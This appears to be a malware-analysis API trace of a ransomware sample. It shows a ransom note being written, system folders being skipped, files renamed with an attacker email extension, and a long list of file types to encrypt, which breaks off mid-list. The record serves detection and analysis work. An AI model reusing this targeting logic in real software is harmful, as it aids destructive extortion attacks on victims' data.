	[0191.686] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0191.686] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0191.686] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0191.686] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0191.686] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0191.687] CloseHandle (hObject=0x384) returned 1
	[0191.687] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f4b4ef0, ftCreationTime.dwHighDateTime=0x1d97041, ftLastAccessTime.dwLowDateTime=0x8bb28bc7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8bb4ec49, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0191.687] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\*.*") returned 42
	[0191.687] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0191.688] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\*.*", cchLength=0x2a | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*") returned 0x2a
	[0191.688] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.688] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="windows") returned 0x0
	[0191.688] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.688] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="boot") returned 0x0
	[0191.688] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.689] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="system volume information") returned 0x0
	[0191.689] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.689] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0191.689] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.689] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="temp") returned 0x0
	[0191.689] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.689] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="program files") returned 0x0
	[0191.689] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.690] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="program files (x86)") returned 0x0
	[0191.691] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.691] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="appdata") returned 0x0
	[0191.691] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.691] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="application data") returned 0x0
	[0191.691] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.691] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="winnt") returned 0x0
	[0191.691] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.692] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="tmp") returned 0x0
	[0191.692] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.692] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="cache") returned 0x0
	[0191.692] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.692] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="temporary internet files") returned 0x0
	[0191.692] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.692] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="webcache") returned 0x0
	[0191.693] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.693] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="inetcache") returned 0x0
	[0191.693] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.693] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="nvidia") returned 0x0
	[0191.693] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.693] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="packages") returned 0x0
	[0191.693] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.693] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="cookies") returned 0x0
	[0191.694] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.694] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\*.*", lpSrch="programdata") returned 0x0
	[0191.694] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0191.694] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0191.694] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f4b4ef0, ftCreationTime.dwHighDateTime=0x1d97041, ftLastAccessTime.dwLowDateTime=0x8bb28bc7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8bb4ec49, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0191.694] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0191.694] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b49a24c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8b49a24c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8b4c05c5, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xbe0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ck0z.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="CK0ZM4~1.SCL")) returned 1
	[0191.694] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b4e6907, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8b4e6907, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8b50cb6a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x7150, dwReserved0=0x0, dwReserved1=0x0, cFileName="gnasynz.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="GNASYN~1.SCL")) returned 1
	[0191.694] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bb4ec49, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8bb4ec49, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8bc8006d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0191.695] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bb4ec49, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8bb4ec49, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8bb4ec49, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0191.695] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdafd4140, ftCreationTime.dwHighDateTime=0x1d967cc, ftLastAccessTime.dwLowDateTime=0x653283c0, ftLastAccessTime.dwHighDateTime=0x1d975b5, ftLastWriteTime.dwLowDateTime=0x653283c0, ftLastWriteTime.dwHighDateTime=0x1d975b5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HXbBqMJvgUE", cAlternateFileName="HXBBQM~1")) returned 1
	[0191.695] lstrcmpW (lpString1="HXbBqMJvgUE", lpString2="..") returned 1
	[0191.695] lstrcmpW (lpString1="HXbBqMJvgUE", lpString2=".") returned 1
	[0191.695] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF"
	[0191.695] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\"
	[0191.695] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\", lpString2="HXbBqMJvgUE" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE"
	[0191.695] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE"
	[0191.695] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\"
	[0191.696] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\"
	[0191.696] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\*.*"
	[0191.696] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdafd4140, ftCreationTime.dwHighDateTime=0x1d967cc, ftLastAccessTime.dwLowDateTime=0x653283c0, ftLastAccessTime.dwHighDateTime=0x1d975b5, ftLastWriteTime.dwLowDateTime=0x653283c0, ftLastWriteTime.dwHighDateTime=0x1d975b5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0191.696] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\*.*") returned 54
	[0191.696] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0191.696] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\*.*", cchLength=0x36 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*") returned 0x36
	[0191.697] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.697] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="windows") returned 0x0
	[0191.697] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.697] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="boot") returned 0x0
	[0191.697] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.697] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="system volume information") returned 0x0
	[0191.697] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.697] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0191.698] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.698] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="temp") returned 0x0
	[0191.698] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.698] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="program files") returned 0x0
	[0191.698] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.698] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="program files (x86)") returned 0x0
	[0191.698] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.698] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="appdata") returned 0x0
	[0191.699] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.699] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="application data") returned 0x0
	[0191.699] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.699] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="winnt") returned 0x0
	[0191.699] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.699] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="tmp") returned 0x0
	[0191.699] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.700] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="cache") returned 0x0
	[0191.700] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.700] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="temporary internet files") returned 0x0
	[0191.700] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.700] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="webcache") returned 0x0
	[0191.700] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.700] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="inetcache") returned 0x0
	[0191.701] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.701] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="nvidia") returned 0x0
	[0191.701] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.701] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="packages") returned 0x0
	[0191.701] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.701] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="cookies") returned 0x0
	[0191.701] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.701] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\*.*", lpSrch="programdata") returned 0x0
	[0191.702] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdafd4140, ftCreationTime.dwHighDateTime=0x1d967cc, ftLastAccessTime.dwLowDateTime=0x653283c0, ftLastAccessTime.dwHighDateTime=0x1d975b5, ftLastWriteTime.dwLowDateTime=0x653283c0, ftLastWriteTime.dwHighDateTime=0x1d975b5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0191.702] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86890e80, ftCreationTime.dwHighDateTime=0x1d96e6d, ftLastAccessTime.dwLowDateTime=0x62af36c0, ftLastAccessTime.dwHighDateTime=0x1d96f7f, ftLastWriteTime.dwLowDateTime=0x62af36c0, ftLastWriteTime.dwHighDateTime=0x1d96f7f, nFileSizeHigh=0x0, nFileSizeLow=0x3de8, dwReserved0=0x0, dwReserved1=0x0, cFileName="0tL74Kvj.mp3", cAlternateFileName="")) returned 1
	[0191.702] lstrcmpW (lpString1="0tL74Kvj.mp3", lpString2="..") returned 1
	[0191.702] lstrcmpW (lpString1="0tL74Kvj.mp3", lpString2=".") returned 1
	[0191.702] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\"
	[0191.702] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\", lpString2="0tL74Kvj.mp3" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\0tL74Kvj.mp3") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\0tL74Kvj.mp3"
	[0191.703] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\0tL74Kvj.mp3") returned 63
	[0191.703] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0191.703] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\HXbBqMJvgUE\\0tL74Kvj.mp3", cchLength=0x3f | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\0tl74kvj.mp3") returned 0x3f
	[0191.703] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.703] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\0tl74kvj.mp3", lpSrch="help_decrypt_your_files") returned 0x0
	[0191.703] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\0tl74kvj.mp3" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\0tl74kvj.mp3") returned="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\0tl74kvj.mp3"
	[0191.703] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\381iz9biyf\\hxbbqmjvgue\\0tl74kvj.mp3") returned 63
	[0191.704] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0191.704] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.704] StrStrW (lpFirst=".mp3", lpSrch=".") returned=".mp3"
	[0191.704] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0191.704] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3